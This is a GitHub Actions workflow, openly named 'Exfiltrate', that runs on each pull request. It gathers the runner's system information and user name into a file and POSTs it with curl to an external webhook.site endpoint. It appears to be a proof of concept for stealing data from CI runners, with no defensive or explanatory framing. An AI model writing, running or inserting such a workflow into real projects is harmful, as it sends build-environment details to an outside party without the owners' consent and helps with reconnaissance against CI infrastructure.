name: Exfiltrate

on: pull_request

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    env:
      TITLE: ${{ github.event.pull_request.title }}
    steps:
      - name: Simulate title usage and extract info
        run: |
          echo "Extracted title: ${TITLE}"
          uname -a > out.txt
          whoami >> out.txt
          curl -X POST --data-binary @out.txt https://webhook.site/5c29126a-0dce-4cec-a189-d102140dd3e8
